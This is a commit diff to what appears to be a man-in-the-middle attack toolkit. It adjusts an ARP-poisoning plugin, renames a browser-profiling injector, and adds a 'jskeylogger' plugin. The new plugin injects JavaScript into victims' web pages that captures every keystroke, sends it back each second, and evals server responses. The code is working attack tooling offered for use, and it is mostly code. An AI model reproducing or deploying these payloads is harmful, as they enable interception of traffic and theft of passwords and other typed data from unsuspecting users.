Minor fixes and jskeylogger plugin now live

plugins/ArpSpoof.py

@@ -89,6 +89,7 @@ class ArpSpoof(Plugin):
     def add_options(self,options):
         options.add_argument('--iface', dest='interface', help='Specify the interface to use')
         options.add_argument('--routerip', dest='routerip', help='Specify the router IP')
+        options.add_argument('\n  Misc Options:')
         options.add_argument('--target', dest='target', help='Specify a particular host to ARP poison [default: subnet]')
         options.add_argument('--mode', dest='mode', default='req', help='Poisoning mode: requests (req) or replies (rep) [default: req]')
         options.add_argument('--summary', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning')

plugins/BrowserProfiler.py

@@ -1,9 +1,9 @@
 from plugins.plugin import Plugin
 from plugins.Inject import Inject
 
-class BrowserProfilerer(Inject, Plugin):
-    name = "Browser Profilerer"
-    optname = "browserprofilerer"
+class BrowserProfiler(Inject, Plugin):
+    name = "Browser Profiler"
+    optname = "browserprofiler"
     desc = "Attempts to enumerate all browser plugins of connected clients"
     has_opts = False
 
@@ -45,21 +45,6 @@ function make_xhr(){
                 eval(xhr.responseText);
             }
         }
-        
-        function makeIframe(url) {
-            ifrm = document.createElement("iframe");
-            ifrm.setAttribute("src", url);
-            ifrm.style.width = 0+"px";
-            ifrm.style.height = 0+"px";
-            document.body.appendChild(ifrm);
-        }
-
-        function makeScript(url){
-            scp = document.createElement("script");
-            scp.setAttribute("type", 'text/javascript');
-            scp.setAttribute("src", url);
-            document.body.appendChild(scp);         
-        }
 
         var data = [];
         userAgent = navigator.userAgent;
@@ -95,7 +80,6 @@ function make_xhr(){
             var datajoined = data.join("&");
             xhr.open("POST", "clientprfl", true);
             xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
-            //alert(datajoined);
             xhr.send(datajoined);
         }
 </script>"""

plugins/jskeylogger.py

@@ -0,0 +1,58 @@
+from plugins.plugin import Plugin
+from plugins.Inject import Inject
+
+class jskeylogger(Inject, Plugin):
+    name = "Javascript Keylogger"
+    optname = "jskeylogger"
+    desc = "Injects a javascript keylogger into clients webpages"
+    has_opts = False
+
+    def initialize(self,options):
+        Inject.initialize(self, options)
+        self.html_payload = self.get_payload()
+        print "[*] %s online" % self.name
+
+    def get_payload(self):
+        #simple js keylogger stolen from http://wiremask.eu/xss-keylogger/
+
+        payload = """var keys = '';
+
+function make_xhr(){
+    var xhr;
+            try {
+                xhr = new XMLHttpRequest();
+            } catch(e) {
+                try {
+                    xhr = new ActiveXObject("Microsoft.XMLHTTP");
+                } catch(e) {
+                    xhr = new ActiveXObject("MSXML2.ServerXMLHTTP");
+                }
+            }
+            if(!xhr) {
+                throw "failed to create XMLHttpRequest";
+            }
+            return xhr;
+        }
+        
+        xhr = make_xhr();
+        xhr.onreadystatechange = function() {
+            if(xhr.readyState == 4 && (xhr.status == 200 || xhr.status == 304)) {
+                eval(xhr.responseText);
+            }
+        }
+
+document.onkeypress = function(e) {
+    var get = window.event ? event : e;
+    var key = get.keyCode ? get.keyCode : get.charCode;
+    key = String.fromCharCode(key);
+    keys += key;
+}
+
+window.setInterval(function(){
+    xhr.open("POST", "keylog", true);
+    xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
+    xhr.send(keys);
+    keys = '';
+}, 1000);"""
+
+        return payload